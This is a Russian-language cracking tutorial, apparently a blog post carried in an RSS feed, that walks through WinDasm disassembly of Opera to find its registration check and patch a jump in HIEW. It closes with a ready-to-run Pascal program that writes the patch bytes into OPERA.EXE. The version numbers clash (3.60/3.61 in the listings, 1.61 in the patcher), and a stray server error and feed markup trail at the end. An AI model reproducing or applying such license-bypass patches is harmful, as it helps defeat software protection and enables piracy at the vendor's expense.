<p>*ОЧЕНЬ ВАЖНО! В проге может быть не одно это место, а несколько, так что щелкайте несколько раз, и смотрите на адреса.</p>
<p>Смотрим первое совпадение:</p>
<p>* Referenced by a (U)nconditional or (C)onditional Jump at Address: <- Первый переход
|:0045F8EF(C)
|
:0045F91F 381D58F55200 cmp byte ptr [0052F558], bl
:0045F925 7535 jne 0045F95C
:0045F927 BE80000000 mov esi, 00000080
:0045F92C 56 push esi
:0045F92D 57 push edi

* Possible Reference to String Resource ID=20092: "Opera 3.61"
|
:0045F92E 687C4E0000 push 00004E7C
:0045F933 8BCD mov ecx, ebp
:0045F935 E8850D0000 call 004606BF
:0045F93A 57 push edi
:0045F93B E8E0A60800 call 004EA020
:0045F940 59 pop ecx
:0045F941 2BF0 sub esi, eax
:0045F943 A30CF55200 mov dword ptr [0052F50C], eax
:0045F948 56 push esi
:0045F949 8D8058F55200 lea eax, dword ptr [eax+0052F558]
:0045F94F 50 push eax

* Possible Reference to String Resource ID=21428: " (unregistered)" <---- Это наш

"unregistered"
|
:0045F950 68B4530000 push 000053B4
:0045F955 8BCD mov ecx, ebp
:0045F957 E8630D0000 call 004606BF

************ ТОЖЕ ВАЖНО! ************

Q: Почему в WinDasm все пишут основные строчки внизу, а не вверху, это неудобно!
A: Т.к. Программа идет сверху вниз ;), а нам нужно посмотреть ЧТО вызвало этот "unregistered"

Q: До какого момента мы смотрим вверх, где останавливаться???
A: Обычно в WinDasm идем вверх до первого jne/je ; jl/jbl; test; cmp ... или до Reference Jump.
***************************************

На данном этапе необходимо остановиться и задуматься, а то ли это место, ведь посмотрите: есть и "unregistered", и "Opera 3.61", и переходов между ними нет, а может это всего лишь: "Opera 3.61 (unregistered)" в главном окне вверху... ИСТИННУ ГЛАГОЛИШЬ.

Смотрим другой адрес (надеюсь, еще не забыли то правило, насчет нескольких мест):

* Possible Reference to Dialog: SPLASH, CONTROL_ID:2B27, "Opera 3.60" <--- Странно,

3.60, что разработчики по этому поводу думают?
|
:00495F64 68272B0000 push 00002B27
:00495F69 FF7508 push [ebp+08]
:00495F6C FFD6 call esi
:00495F6E 8D8540FBFFFF lea eax, dword ptr [ebp+FFFFFB40]
:00495F74 50 push eax
* Possible Reference to Dialog: SPLASH, CONTROL_ID:2B25, " "
|
:00495F75 68252B0000 push 00002B25
:00495F7A FF7508 push [ebp+08]
:00495F7D FFD6 call esi
:00495F7F 8D856CFCFFFF lea eax, dword ptr [ebp+FFFFFC6C]
:00495F85 50 push eax

* Possible Reference to Dialog: SPLASH, CONTROL_ID:2B26, " "
|
:00495F86 68262B0000 push 00002B26
:00495F8B FF7508 push [ebp+08]
:00495F8E FFD6 call esi
:00495F90 393D64005300 cmp dword ptr [00530064], edi <---Сравнивание с edi
:00495F96 752A jne 00495FC2 <--- "ПЕРвЫй переХод"
:00495F98 68FF000000 push 000000FF
:00495F9D 8D85C4FEFFFF lea eax, dword ptr [ebp+FFFFFEC4]
:00495FA3 50 push eax

* Possible Reference to String Resource ID=21428: " (unregistered)" <--- Вот ОН наш

REAL unreg.
|
:00495FA4 68B4530000 push 000053B4
:00495FA9 FF3570FA5200 push dword ptr [0052FA70]
:00495FAF FFD3 call ebx
:00495FB1 8D85C5FEFFFF lea eax, dword ptr [ebp+FFFFFEC5]
:00495FB7 50 push eax
МДАСССССС, спокуха, это все фигня на самом деле.
ТАК, как всегда, ловим первый попавшийся переход, вот и он:

:00495F90 393D64005300 cmp dword ptr [00530064], edi
:00495F96 752A jne 00495FC2 <--- "ПЕРвЫй переХод"

*Je/Jne - Unconditional(jump if equal)/Conditional(jump if not equal); здесь важно понять эти действия: "Если [00530064] НЕРАВНО edi, то перейти на ПРАВИЛЬНУЮ РЕГИСТРАЦИЮ". (Действительно запутывающе).

Смотрите, до него идет сравнивание значения в [00530064] с edi. Ну, поняли? Всего лишь осталось сделать так, чтобы в этом значении И БЫЛО ЭТО edi !!!

Давайте снова остановимся и задумаемся, каким образом сравнивается значение из [00530064] с edi? Ведь для того, чтобы сравнить что-либо, нужно поместить туда что-нибудь, А КАК ПОМЕСТИТЬ?

Чтобы найти, место, где помещается определенное значение в [00530064], сделаем так: в WinDasm жмем поиск и печатаем, почти ничего не изменяя: mov dword ptr [00530064]

Согласитесь, логично, если там cmp, то здесь mov (*ЧИТАТЬ СТАТЬЮ Dr.Golova ОБ ОСНОВАХ АССЕМБЛЕРА !)

И WinDasm найдет нам всего лишь одну (в случае с Оперой) ссылку, туда и пойдем:

:00495E1F E8C3630200 call 004BC1E7
:00495E24 3BC7 cmp eax, edi
:00495E26 A364005300 mov dword ptr [00530064], eax <--- То, что искали.

ЧТО отсюда можно извлечь? Самое главное: все происходит в

:00495E1F E8C3630200 call 004BC1E7

Идем в эту функцию:

:004BC1E7 8D8138010000 lea eax, dword ptr [ecx+00000138]
:004BC1ED 85C0 test eax, eax
:004BC1EF 741A je 004BC20B <--- 1 Переход.
:004BC1F1 803800 cmp byte ptr [eax], 00
:004BC1F4 7415 je 004BC20B <--- 2 Переход.
:004BC1F6 81C190030000 add ecx, 00000390
:004BC1FC 51 push ecx
:004BC1FD E8A647FDFF call 004909A8
:004BC202 85C0 test eax, eax
:004BC204 59 pop ecx
:004BC205 7404 je 004BC20B <--- 3 Переход.
:004BC207 6A01 push 00000001 <--- Еденицу на стек.
:004BC209 58 pop eax <--- Снимаем еденицу из стека в еах.
:004BC20A C3 ret

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:004BC1EF(C), :004BC1F4(C), :004BC205(C)
|
:004BC20B 33C0 xor eax, eax
:004BC20D C3 ret

Видим чудеса: 3 перехода на обнуление и выход да еще видим сравнение eax с 0 и снова выход, что же здесь думать-то, если после последнего перехода есть установка этой самой единицы!!!

Нус, осталось всего-то с первого перехода прыгнуть на установку единицы!
Теперь убеждаемся, что в WinDasm строка установлена на 4BC1EF (горит зеленым), потом на 4BC207 и смотрим внизу на смещение (Offset), это BC1EF и BC207.

*Для использования в HIEW смещения (offsets) из WinDasm берем БЕЗ последней h (например "BC1EFh" из WinDasm) для использования в HIEW возьмем только "BC1EF".

Переходим в Far Manager по Alt-Tab (remember the very begining?), и "hiew opera.exe", там переходим в F4 > Decode Mode, потом F5 > Search BC1EF и наконец редактируем: жмем F3 (Edit), потом F2 (Asm) и пишем: jmps BC207 (вместо je&#8230;), и наконец жмем F9 (Update), чтобы сохранить изменения.</p>
<p>(* Прим. Dr.Golova: Можно сделать иначе, поскольку HIEW умеет преводить виртуальные адреса из WinDasm в реальные файловые. Мы сразу наберем адрес 4BC1EF из WinDasm в окошке &#171;GoTo&#187; HIEW&#8217;a (те же самые F4 > DecodeMode > F5), только его надо дополнить точкой и нулями до вида &#171;.004BC1EF&#187;. Попадем в то же самое место. Как проще &#8212; решать вам, но так по крайней мере не надо смотреть offset. *)</p>
<p>THAT&#8217;s All folks ;))))</p>
<p>Вот мой патч на ПАСКАЛЕ:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;cut&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
program opera161_crack;<br />
Const A: Array[1..2] of Record<br />
A : Longint;<br />
B : Byte;<br />
End = ( (A : $BC1EF; B : $EB),<br />
(A : $BC1F0; B : $16) );<br />
Var Ch : Char;<br />
I : Byte;<br />
F : File;</p>
<p>Begin<br />
Writeln(&#8216;Kondor&#187;s patch&#8217;, #10#13, &#8216;Crack for Opera v1.61&#8242;);<br />
Assign(F, &#8216;OPERA.EXE&#8217;);<br />
Reset(F, 1);</p>
<p>If IOResult <> 0 then<br />
begin<br />
Writeln(&#8216;File not found!&#8217;);<br />
Halt(1);<br />
end;</p>
<p>For I := 1 to 2 do<br />
Begin<br />
Seek(F, A[I].A);<br />
Ch := Char(A[I].B);<br />
BlockWrite(F, Ch, 1);<br />
End;</p>
<p>Writeln(#10#13, &#8216;File successfully patched!&#8217;);<br />
End.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-284/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
